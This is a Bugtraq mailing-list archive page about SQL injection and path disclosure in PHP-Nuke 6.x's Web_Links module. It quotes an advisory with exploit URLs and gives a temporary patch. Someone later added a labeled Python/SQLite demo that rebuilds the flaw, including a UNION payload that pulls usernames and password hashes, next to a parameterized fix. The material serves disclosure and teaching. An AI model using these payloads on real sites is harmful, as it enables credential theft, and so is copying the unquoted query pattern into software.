Bugtraq mailing list archives
Re: Lot of SQL injection on PHP-Nuke 6.5 (secure weblog!)
From: Rynho Zeros Web <hackargentino () gmx net>
Date: Tue, 13 May 2003 00:22:25 +0200 (MEST)
I have also discovered a path disclosure on PHP-Nuke 6.x, and others? Exploit:

http://victim.x/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=[any_words]
http://victim.x/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink

If [any_words] has a non-numerical value or a NULL value, this will produce a "path disclosure". In addition to this form, as Ripe has reported, a SQL injection can be made.

Patch (this is a temporary patch, but... it is running). In the viewlink function insert the following:

------------------------[ CODE ]------------------------
// Reject a missing, empty or non-numeric cid before it reaches the SQL query
if (!isset($cid) || $cid == NULL || $cid == "" || !is_numeric($cid)) {
    echo "I don't like you >:|";
    exit();
}
------------------------[ CODE ]------------------------

------ XyborG ------
Thanks to Verstand & Chiz0
/-----------------------------------------------------------------------------\
| 7 A 6 9 - A d v C: 010                                                      |
|-----------------------------------------------------------------------------|
|                        [ PHP-Nuke SQL injection ]                           |
\-----------------------------------------------------------------------------/
                                                                | 11/05/2003 |
                                                                \------------/

Data.
-----

 + Type: SQL injection.
 + Software: PHP-Nuke
 + Versions: 6.x (including 6.5) and 5.x
 + Exploit: Yes
 + Author: Albert Puigsech Galicia
 + Contact: ripe () 7a69ezine org

Introduction.
-------------

PhpNuke is a well known content management system programmed in PHP by Francisco Bucci; a lot of people use it because it is very easy to install and manage.

Description.
------------

The Web_Links module, included in the PHP-Nuke base package, has multiple SQL injections (more than 20). The web user may be able to insert his own SQL code in most of the numeric values included in queries, because the plugin coder didn't use inverted commas.

Exploitation.
-------------

If the SQL engine allows us to use a UNION statement (like MySQL 4 does) it is possible to extract information about anything inside the database; of course this includes passwords, personal data, etc. Otherwise, without the UNION possibility we can't access other SQL tables than the web links management ones, so the only possibility is to play with hits and votes.

Some examples:

[*] In the viewlink function:

$result = sql_query("select title,parentid from ".$prefix."_links_categories where cid=$cid", $dbi);

http://victim/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=2%20<our_code>

[*] Vim index.php... There are a lot.

Patch.
------

There is no patch for this vulnerability. But it is easy to add inverted commas on all numeric values.

Notes.
------

I'm really surprised about PHP-Nuke usage. I can't understand that software with PHP-Nuke's security history may be used. Lots of vulnerabilities have been discovered in this software in the last months, and there are more bugs.

Recommendation for PHP-Nuke users: Migrate!

--
---------------------------
Albert Puigsech Galicia
http://ripe.7a69ezine.org
---------------------------
--
XyBØrG
WebMaster of: www.RZWEB.com.ar
Powered By Dattatec.Com
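The following is an added example, not code from the advisory, from XyborG's reply, or from PHP-Nuke itself. It reproduces in Python, with an in-memory SQLite database standing in for PHP/MySQL, the `where cid=$cid` pattern quoted from the viewlink function: the unquoted, unvalidated `cid` is spliced into the query text, so a `2 union select ...` value (the `cid=2%20<our_code>` shape from the advisory) pulls rows out of an unrelated table, and a non-numeric value produces a database error of the kind that, when PHP-Nuke printed it, gave the path disclosure XyborG mentions. The table names `nuke_links_categories` and `nuke_users`, their columns and the sample rows are constructed for the demo (the advisory only names `$prefix."_links_categories"`); `viewlink_fixed` is my hardened version, which takes the intent of the posted `is_numeric()` check but accepts only a plain decimal integer and binds it as a query parameter.

```python
import re
import sqlite3

# Constructed sample data; the "nuke_" prefix and the nuke_users layout are
# assumptions for the demo, not taken from PHP-Nuke.
SAMPLE_SCHEMA = """
CREATE TABLE nuke_links_categories (cid INTEGER, title TEXT, parentid INTEGER);
INSERT INTO nuke_links_categories VALUES (1, 'Security', 0), (2, 'Linux', 0);
CREATE TABLE nuke_users (uid INTEGER, uname TEXT, pass TEXT);
INSERT INTO nuke_users VALUES
    (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99'),
    (2, 'bob',   '098f6bcd4621d373cade4e832627b4f6');
"""

# What the attacker sends in the cid parameter (URL-decoded form of
# cid=2%20union%20select%20uname,pass%20from%20nuke_users).
UNION_PAYLOAD = "2 union select uname,pass from nuke_users"


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SAMPLE_SCHEMA)
    return db


def viewlink_vulnerable(db, cid):
    # Same construction as the advisory's sql_query(...): the request value is
    # pasted into the SQL text with no quoting and no type check.
    sql = f"select title,parentid from nuke_links_categories where cid={cid}"
    return db.execute(sql).fetchall()


def viewlink_fixed(db, cid):
    # Hardened version (added here, not PHP-Nuke's code): accept only a plain
    # decimal integer, then pass it as a bound parameter so the value can never
    # be parsed as SQL. Stricter than is_numeric(), which also admits "1e3" etc.
    if not isinstance(cid, str) or not re.fullmatch(r"[0-9]+", cid):
        raise ValueError("cid must be a positive integer")
    sql = "select title,parentid from nuke_links_categories where cid=?"
    return db.execute(sql, (int(cid),)).fetchall()


def run_demo():
    """Run the legitimate, injected and non-numeric requests against both versions."""
    db = build_db()
    out = {}

    out["legit"] = viewlink_vulnerable(db, "2")
    # UNION appends the users table to the category lookup: credentials leak.
    out["leaked"] = set(viewlink_vulnerable(db, UNION_PAYLOAD))
    try:
        viewlink_vulnerable(db, "abc")
        out["error_on_junk"] = False
    except sqlite3.OperationalError:
        # MySQL behaves the same way; PHP-Nuke echoed the error with its file
        # path, which is the path disclosure from the reply above.
        out["error_on_junk"] = True

    out["fixed_legit"] = viewlink_fixed(db, "2")
    try:
        viewlink_fixed(db, UNION_PAYLOAD)
        out["fixed_blocks_payload"] = False
    except ValueError:
        out["fixed_blocks_payload"] = True
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Running the block shows the vulnerable query returning the `Linux` category followed by every username and password hash from `nuke_users`, while the hardened version serves the legitimate request and rejects the payload before any SQL runs. Note that the first column of the leaked rows lands in the `title` slot and the hash in `parentid`, which is why the advisory says UNION lets you read "anything inside the database": the attacker only has to match the column count of the original select.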
Current thread:
- Lot of SQL injection on PHP-Nuke 6.5 (secure weblog!) Albert Puigsech Galicia (May 12)
- Re: Lot of SQL injection on PHP-Nuke 6.5 (secure weblog!) Rynho Zeros Web (May 13)
- Re[2]: Lot of SQL injection on PHP-Nuke 6.5 (secure weblog!) Benjamin Schulz (May 15)
- Re: Lot of SQL injection on PHP-Nuke 6.5 (secure weblog!) Rynho Zeros Web (May 13)